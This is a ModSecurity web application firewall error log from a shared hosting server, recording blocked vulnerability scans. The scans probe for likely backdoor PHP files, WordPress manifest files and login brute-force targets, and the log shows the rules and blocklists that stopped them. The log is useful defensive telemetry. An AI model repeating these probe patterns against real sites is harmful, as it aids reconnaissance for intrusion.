[Tue May 26 14:47:57.111693 2026] [security2:error] [pid 648203:tid 648389] [client 4.201.75.230:42197] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/wp-mail.php"] [unique_id "ahVlRbEQDDtxJNiDrdTU5gAAAL0"]
[Tue May 26 14:47:57.232775 2026] [security2:error] [pid 648203:tid 648340] [client 216.26.249.56:53187] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlRLEQDDtxJNiDrdTUyQAAAIw"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:57.344572 2026] [security2:error] [pid 648203:tid 648366] [client 4.201.75.230:38179] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/wp-mail.php"] [unique_id "ahVlRbEQDDtxJNiDrdTU7QAAAKY"]
[Tue May 26 14:47:57.344731 2026] [security2:error] [pid 648203:tid 648366] [client 4.201.75.230:38179] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/wp-mail.php"] [unique_id "ahVlRbEQDDtxJNiDrdTU7QAAAKY"]
[Tue May 26 14:47:58.001044 2026] [security2:error] [pid 648203:tid 648383] [client 14.236.16.98:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlRbEQDDtxJNiDrdTU9wAAALc"]
[Tue May 26 14:47:58.027464 2026] [security2:error] [pid 648203:tid 648380] [client 4.201.75.230:2260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/wp.php"] [unique_id "ahVlRrEQDDtxJNiDrdTVFQAAALQ"]
[Tue May 26 14:47:58.027571 2026] [security2:error] [pid 648203:tid 648380] [client 4.201.75.230:2260] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/wp.php"] [unique_id "ahVlRrEQDDtxJNiDrdTVFQAAALQ"]
[Tue May 26 14:47:58.114226 2026] [security2:error] [pid 648203:tid 648346] [client 4.201.75.230:23047] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/wp.php"] [unique_id "ahVlRrEQDDtxJNiDrdTVGwAAAJI"]
[Tue May 26 14:47:58.114334 2026] [security2:error] [pid 648203:tid 648346] [client 4.201.75.230:23047] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/wp.php"] [unique_id "ahVlRrEQDDtxJNiDrdTVGwAAAJI"]
[Tue May 26 14:47:58.252531 2026] [security2:error] [pid 648203:tid 648460] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlRbEQDDtxJNiDrdTVAQAAAQQ"]
[Tue May 26 14:47:59.002573 2026] [security2:error] [pid 648203:tid 648445] [client 4.201.75.230:41773] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/adminfuns.php"] [unique_id "ahVlR7EQDDtxJNiDrdTVQQAAAPU"]
[Tue May 26 14:47:59.002701 2026] [security2:error] [pid 648203:tid 648445] [client 4.201.75.230:41773] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/adminfuns.php"] [unique_id "ahVlR7EQDDtxJNiDrdTVQQAAAPU"]
[Tue May 26 14:47:59.138151 2026] [security2:error] [pid 648203:tid 648443] [client 4.201.75.230:38190] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/adminfuns.php"] [unique_id "ahVlR7EQDDtxJNiDrdTVRgAAAPM"]
[Tue May 26 14:47:59.138265 2026] [security2:error] [pid 648203:tid 648443] [client 4.201.75.230:38190] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/adminfuns.php"] [unique_id "ahVlR7EQDDtxJNiDrdTVRgAAAPM"]
[Tue May 26 14:47:59.525901 2026] [security2:error] [pid 648203:tid 648362] [client 151.123.177.164:38167] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlRrEQDDtxJNiDrdTVIQAAAKI"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:59.660830 2026] [security2:error] [pid 648203:tid 648381] [client 4.201.75.230:28823] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/php8.php"] [unique_id "ahVlR7EQDDtxJNiDrdTVUAAAALU"]
[Tue May 26 14:47:59.660979 2026] [security2:error] [pid 648203:tid 648381] [client 4.201.75.230:28823] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/php8.php"] [unique_id "ahVlR7EQDDtxJNiDrdTVUAAAALU"]
[Tue May 26 14:48:00.272444 2026] [security2:error] [pid 648203:tid 648347] [client 4.201.75.230:35322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/php8.php"] [unique_id "ahVlSLEQDDtxJNiDrdTVaQAAAJM"]
[Tue May 26 14:48:00.272544 2026] [security2:error] [pid 648203:tid 648347] [client 4.201.75.230:35322] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/php8.php"] [unique_id "ahVlSLEQDDtxJNiDrdTVaQAAAJM"]
[Tue May 26 14:48:00.345179 2026] [security2:error] [pid 648203:tid 648440] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlR7EQDDtxJNiDrdTVXAAAAPA"]
[Tue May 26 14:48:00.838863 2026] [security2:error] [pid 648203:tid 648377] [client 4.201.75.230:28827] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/ioxi-o.php"] [unique_id "ahVlSLEQDDtxJNiDrdTViAAAALE"]
[Tue May 26 14:48:00.838954 2026] [security2:error] [pid 648203:tid 648377] [client 4.201.75.230:28827] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/ioxi-o.php"] [unique_id "ahVlSLEQDDtxJNiDrdTViAAAALE"]
[Tue May 26 14:48:01.416076 2026] [security2:error] [pid 648203:tid 648426] [client 4.201.75.230:31119] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/ioxi-o.php"] [unique_id "ahVlSbEQDDtxJNiDrdTVlwAAAOI"]
[Tue May 26 14:48:01.416190 2026] [security2:error] [pid 648203:tid 648426] [client 4.201.75.230:31119] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/ioxi-o.php"] [unique_id "ahVlSbEQDDtxJNiDrdTVlwAAAOI"]
[Tue May 26 14:48:01.789238 2026] [security2:error] [pid 648203:tid 648430] [client 65.111.29.3:33405] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlSLEQDDtxJNiDrdTVewAAAOY"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:01.908595 2026] [security2:error] [pid 648203:tid 648404] [client 4.201.75.230:33872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/edit.php"] [unique_id "ahVlSbEQDDtxJNiDrdTVqgAAAMw"]
[Tue May 26 14:48:01.908719 2026] [security2:error] [pid 648203:tid 648404] [client 4.201.75.230:33872] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/edit.php"] [unique_id "ahVlSbEQDDtxJNiDrdTVqgAAAMw"]
[Tue May 26 14:48:02.148848 2026] [security2:error] [pid 648203:tid 648427] [client 4.201.75.230:2275] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/edit.php"] [unique_id "ahVlSrEQDDtxJNiDrdTVswAAAOM"]
[Tue May 26 14:48:02.148951 2026] [security2:error] [pid 648203:tid 648427] [client 4.201.75.230:2275] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/edit.php"] [unique_id "ahVlSrEQDDtxJNiDrdTVswAAAOM"]
[Tue May 26 14:48:02.624444 2026] [security2:error] [pid 648203:tid 648419] [client 4.201.75.230:31132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/sid3.php"] [unique_id "ahVlSrEQDDtxJNiDrdTVwAAAANs"]
[Tue May 26 14:48:02.624645 2026] [security2:error] [pid 648203:tid 648419] [client 4.201.75.230:31132] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/sid3.php"] [unique_id "ahVlSrEQDDtxJNiDrdTVwAAAANs"]
[Tue May 26 14:48:02.721386 2026] [security2:error] [pid 648203:tid 648452] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlSrEQDDtxJNiDrdTVtwAAAPw"]
[Tue May 26 14:48:03.021603 2026] [security2:error] [pid 648203:tid 648348] [client 4.201.75.230:33695] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/sid3.php"] [unique_id "ahVlS7EQDDtxJNiDrdTV0QAAAJQ"]
[Tue May 26 14:48:03.021738 2026] [security2:error] [pid 648203:tid 648348] [client 4.201.75.230:33695] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/sid3.php"] [unique_id "ahVlS7EQDDtxJNiDrdTV0QAAAJQ"]
[Tue May 26 14:48:03.618123 2026] [security2:error] [pid 648203:tid 648417] [client 4.201.75.230:33681] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/166.php"] [unique_id "ahVlS7EQDDtxJNiDrdTV3AAAANk"]
[Tue May 26 14:48:03.618250 2026] [security2:error] [pid 648203:tid 648417] [client 4.201.75.230:33681] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/166.php"] [unique_id "ahVlS7EQDDtxJNiDrdTV3AAAANk"]
[Tue May 26 14:48:03.939904 2026] [security2:error] [pid 648203:tid 648406] [client 45.3.52.35:47059] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlSrEQDDtxJNiDrdTVyAAAAM4"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:04.563942 2026] [security2:error] [pid 648203:tid 648261] [remote 141.95.202.18:50774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVlTLEQDDtxJNiDrdTV9QAA7Tk"]
[Tue May 26 14:48:04.988296 2026] [security2:error] [pid 648203:tid 648347] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlTLEQDDtxJNiDrdTV_QAAAJM"]
[Tue May 26 14:48:06.032801 2026] [security2:error] [pid 648203:tid 648421] [client 45.3.45.143:13185] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlTLEQDDtxJNiDrdTWBgAAAN0"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:06.292129 2026] [security2:error] [pid 648203:tid 648434] [client 45.154.98.38:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpanel.ndequipments.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahVlTrEQDDtxJNiDrdTWPAAAAOo"]
[Tue May 26 14:48:06.724035 2026] [security2:error] [pid 648203:tid 648415] [client 45.154.98.38:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.98.154.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cpanel.ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahVlTrEQDDtxJNiDrdTWTwAAANc"]
[Tue May 26 14:48:07.199306 2026] [security2:error] [pid 648203:tid 648382] [client 45.154.98.38:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpanel.ndequipments.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVlT7EQDDtxJNiDrdTWagAAALY"]
[Tue May 26 14:48:07.270788 2026] [security2:error] [pid 648203:tid 648443] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlTrEQDDtxJNiDrdTWWwAAAPM"]
[Tue May 26 14:48:07.513319 2026] [security2:error] [pid 648203:tid 648407] [client 45.154.98.38:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpanel.ndequipments.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVlT7EQDDtxJNiDrdTWeAAAAM8"]
[Tue May 26 14:48:07.820413 2026] [security2:error] [pid 648203:tid 648361] [client 45.154.98.38:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpanel.ndequipments.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVlT7EQDDtxJNiDrdTWgAAAAKE"]
[Tue May 26 14:48:08.129955 2026] [security2:error] [pid 648203:tid 648400] [client 45.154.98.38:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpanel.ndequipments.com"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahVlULEQDDtxJNiDrdTWhQAAAMg"]
[Tue May 26 14:48:08.148392 2026] [security2:error] [pid 648203:tid 648355] [client 216.26.225.134:61419] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlT7EQDDtxJNiDrdTWZgAAAJs"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:08.446590 2026] [security2:error] [pid 648203:tid 648392] [client 45.154.98.38:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpanel.ndequipments.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVlULEQDDtxJNiDrdTWjwAAAMA"]
[Tue May 26 14:48:08.753495 2026] [security2:error] [pid 648203:tid 648402] [client 45.154.98.38:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpanel.ndequipments.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahVlULEQDDtxJNiDrdTWmgAAAMo"]
[Tue May 26 14:48:08.840120 2026] [security2:error] [pid 648203:tid 648365] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlULEQDDtxJNiDrdTWjgAAAKU"]
[Tue May 26 14:48:09.053702 2026] [security2:error] [pid 648203:tid 648433] [client 162.244.144.154:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVlT7EQDDtxJNiDrdTWfQAAAOk"], referer: https://www.anujtradingco.com/
[Tue May 26 14:48:09.059211 2026] [security2:error] [pid 648203:tid 648375] [client 45.154.98.38:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpanel.ndequipments.com"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahVlUbEQDDtxJNiDrdTWpQAAAK8"]
[Tue May 26 14:48:09.364580 2026] [security2:error] [pid 648203:tid 648361] [client 45.154.98.38:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpanel.ndequipments.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVlUbEQDDtxJNiDrdTWrwAAAKE"]
[Tue May 26 14:48:09.673603 2026] [security2:error] [pid 648203:tid 648416] [client 45.154.98.38:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpanel.ndequipments.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVlUbEQDDtxJNiDrdTWuQAAANg"]
[Tue May 26 14:48:09.980544 2026] [security2:error] [pid 648203:tid 648338] [client 45.154.98.38:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpanel.ndequipments.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVlUbEQDDtxJNiDrdTWxQAAAIo"]
[Tue May 26 14:48:10.286861 2026] [security2:error] [pid 648203:tid 648362] [client 45.154.98.38:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpanel.ndequipments.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVlUrEQDDtxJNiDrdTW1QAAAKI"]
[Tue May 26 14:48:10.327503 2026] [security2:error] [pid 648203:tid 648435] [client 65.111.13.209:49329] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlUbEQDDtxJNiDrdTWqAAAAOs"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:10.515463 2026] [security2:error] [pid 648203:tid 648333] [client 114.119.155.83:33549] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVlUrEQDDtxJNiDrdTW3QAAAIU"], referer: http://glorodavionics.com/index.php?route=product%2Fproduct&manufacturer_id=11&product_id=150&page=6
[Tue May 26 14:48:10.594795 2026] [security2:error] [pid 648203:tid 648455] [client 45.154.98.38:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpanel.ndequipments.com"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahVlUrEQDDtxJNiDrdTW5AAAAP8"]
[Tue May 26 14:48:10.662830 2026] [security2:error] [pid 648203:tid 648433] [client 162.244.144.154:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVlUrEQDDtxJNiDrdTW4wAAAOk"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1231675&moderation-hash=b9f3913f537919d09439896dc0e6dc48
[Tue May 26 14:48:10.902807 2026] [security2:error] [pid 648203:tid 648391] [client 45.154.98.38:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpanel.ndequipments.com"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahVlUrEQDDtxJNiDrdTW7gAAAL8"]
